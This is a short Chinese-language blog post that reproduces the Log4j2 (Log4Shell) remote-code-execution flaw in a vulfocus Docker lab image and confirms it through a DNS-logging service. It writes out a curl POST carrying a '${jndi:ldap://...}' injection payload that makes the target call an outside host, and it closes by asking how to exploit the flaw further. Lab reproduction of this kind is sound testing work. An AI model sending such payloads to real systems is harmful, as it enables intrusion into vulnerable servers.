復現現象:
這個鏡像使用了log4j2用來當做靶機程式
1、拉取一個docker鏡像 docker pull vulfocus/log4j2-rce-2021-12-09
2、跑起來docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09
3、進入這個平臺 https://log.xn–9tr.com/ 點擊獲取一個域名

4、執行一個post curl -X POST -F “payload=${jndi:ldap://king.xxxx.dns.1433.eu.org/exp}” http:/xxxxx:38080/hello
5、點擊獲取記錄
這樣說明log4j2 執行了上報dns記錄,但是怎么利用這個漏洞吶?

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/381935.html
標籤:其他
